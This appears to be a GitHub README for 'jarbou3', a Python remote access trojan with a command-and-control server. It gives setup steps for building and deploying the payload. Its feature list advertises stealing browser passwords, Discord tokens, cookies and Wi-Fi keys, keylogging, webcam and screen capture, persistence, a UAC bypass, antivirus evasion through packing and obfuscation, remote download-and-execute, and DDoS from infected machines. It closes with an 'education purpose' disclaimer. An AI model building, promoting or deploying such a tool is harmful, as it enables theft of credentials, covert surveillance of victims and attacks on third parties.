jarbou3 copied to clipboard
Jarbou3 is rat tool coded in python with C&C which can accept multiple connections from clients
Jarbou3 is rat tool with coded in python with C&C which can accept multiple connections from clients
Follow on Social Media Platforms
- [x] unrar ngrok.rar in scripts before using ngroksetup module
Server Tested On
Kali Linux - ROLLING EDITION (Has Some bugs Will be Fixed Soon)
How To Use in Linux
# Install dependencies
$ bash installer.sh
#run the C&C.py
$python3 C&\C.py
#build payload
run build command in the C\&C.py
How To Use in Windows
# Install dependencies
$ Install latest python 3.x
# Clone this repository
$ git clonehttps://github.com/youhacker55/jarbou3/
# Go into the repository
$ cd jarbou3
# Installing dependencies
$ run installer.bat
# Run the tool
$ open C&C.py
#Build Payload
$ type Buid in C2server
- [x] C&C server which can accept multiple clients
- [x] builder
- [x] Undetectable
- [x] Steal chrome passwords
- [x] Steal Discord Token
- [x] Persistence
- [x] download + upload files
- [x] run powershell commands
- [x] spawn other programmes
- [x] screenshot
- [x] Keylooger
- [x] send commands to all clients
- [x] download file and exec
- [x] Say Function Funny Function make Client talk
- [x] isopen check if port open on ip that connected in the client network
- [x] priv for checking current privileges that client have in the system
- [x] clip function change clipoard content
- [x] builder can host:port from url should be raw
- [x] auto Persistence
- [x] sysinfo function
- [x] auto reconnect
- [x] added function to see running process in the client system
- [x] kill kill process in the client system
- [x] screenshare stream target Desktop
- [x] ngroksetup setup ngrok on target system
- [x] changepolicy run any powershell scripts
- [x] cwallpaper change wallpaper
- [x] server need key from client to accept connection
- [x] server will not accept duplicated client
- [x] webcam_snap open target webcam
- [x] webcam_list get sources of webcams
- [x] now it use upx packer when compiling
- [x] bypass uac exploit
- [x] obfuscate C2 ip and port
- [x] sendall func fixed
- [x] playsound play wav file in the background (just .wav)
- [x] FindFiles function find files with targeted extention on selected path in target system
- [x] Av_recon Module get info Client Antivirus
- [x] Get-Wifi Extract Wifi Passwords
- [x] Grab Cookies
- [x] Start Http Server For Browsing Target Files
- [x] start distributed denial-of-service (DDoS) from clients
TO BE USED FOR Education Purpose
The use of the jarbou3 COMPLETE RESPONSIBILITY of the END-USER. Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program.